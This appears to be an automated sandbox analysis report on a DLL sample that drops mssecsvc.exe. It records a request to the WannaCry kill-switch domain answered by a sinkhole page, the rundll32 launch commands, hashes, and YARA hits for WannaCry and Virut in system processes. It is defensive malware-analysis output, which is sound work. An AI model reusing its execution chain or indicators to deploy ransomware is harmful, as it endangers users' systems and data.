                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.449792104.17.244.8180C:\Windows\mssecsvc.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jul 20, 2022 17:54:08.444561958 CEST17314OUTGET / HTTP/1.1
                                                                              Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                              Cache-Control: no-cache
                                                                              Jul 20, 2022 17:54:08.478476048 CEST17315INHTTP/1.1 200 OK
                                                                              Date: Wed, 20 Jul 2022 15:54:08 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 607
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 72dcdfaacf3c9046-FRA
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:17:51:01
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:loaddll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll"
                                                                              Imagebase:0xd90000
                                                                              File size:116736 bytes
                                                                              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:1
                                                                              Start time:17:51:02
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
                                                                              Imagebase:0x1190000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:2
                                                                              Start time:17:51:03
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\FjYNZSPNkt.dll,PlayGame
                                                                              Imagebase:0xc20000
                                                                              File size:61952 bytes
                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:3
                                                                              Start time:17:51:03
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
                                                                              Imagebase:0xc20000
                                                                              File size:61952 bytes
                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:4
                                                                              Start time:17:51:04
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\mssecsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\WINDOWS\mssecsvc.exe
                                                                              Imagebase:0x400000
                                                                              File size:3751936 bytes
                                                                              MD5 hash:D6F23DCB793C969936142BF9B4F53837
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.263630110.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.267296098.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.261950970.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.265483719.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.265422211.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.267432086.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 97%, ReversingLabs
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:5
                                                                              Start time:17:51:06
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",PlayGame
                                                                              Imagebase:0xc20000
                                                                              File size:61952 bytes
                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:6
                                                                              Start time:17:51:07
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\mssecsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\WINDOWS\mssecsvc.exe
                                                                              Imagebase:0x400000
                                                                              File size:3751936 bytes
                                                                              MD5 hash:D6F23DCB793C969936142BF9B4F53837
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.266941602.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.274690512.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.272255673.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:7
                                                                              Start time:17:51:08
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:winlogon.exe
                                                                              Imagebase:0x7ff775840000
                                                                              File size:677376 bytes
                                                                              MD5 hash:F9017F2DC455AD373DF036F5817A8870
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.784858660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.280733139.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.280760913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.270789242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:9
                                                                              Start time:17:51:11
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\lsass.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                              Imagebase:0x7ff765a60000
                                                                              File size:57976 bytes
                                                                              MD5 hash:317340CD278A374BCEF6A30194557227
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.275433265.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.784832443.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.785185973.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:11
                                                                              Start time:17:51:12
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\mssecsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\WINDOWS\mssecsvc.exe -m security
                                                                              Imagebase:0x400000
                                                                              File size:3751936 bytes
                                                                              MD5 hash:D6F23DCB793C969936142BF9B4F53837
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.388561725.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000B.00000002.384391046.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000B.00000000.278777531.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:12
                                                                              Start time:17:51:13
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:fontdrvhost.exe
                                                                              Imagebase:0x7ff6e3c70000
                                                                              File size:790304 bytes
                                                                              MD5 hash:31113981180E69C2773BCADA4051738A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.784858957.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.785409783.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.296758568.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.280492982.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.296737411.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:13
                                                                              Start time:17:51:14
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:fontdrvhost.exe
                                                                              Imagebase:0x7ff6e3c70000
                                                                              File size:790304 bytes
                                                                              MD5 hash:31113981180E69C2773BCADA4051738A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.785329108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.784858398.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.283233215.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.298581179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.298527592.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:14
                                                                              Start time:17:51:16
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:15
                                                                              Start time:17:51:17
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.784858800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.785379244.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.300859546.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.290186231.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.300842077.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:16
                                                                              Start time:17:51:21
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000000.302543511.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000000.297399320.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000000.302520549.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000002.785307990.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000002.784853909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              General

                                                                              Target ID:17
                                                                              Start time:17:51:21
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:18
                                                                              Start time:17:51:22
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                              Imagebase:0x7ff62dce0000
                                                                              File size:36864 bytes
                                                                              MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:19
                                                                              Start time:17:51:22
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:20
                                                                              Start time:17:51:23
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:21
                                                                              Start time:17:51:25
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:163336 bytes
                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:22
                                                                              Start time:17:51:25
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:23
                                                                              Start time:17:51:26
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:24
                                                                              Start time:17:51:27
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k rpcss -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000000.314054124.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
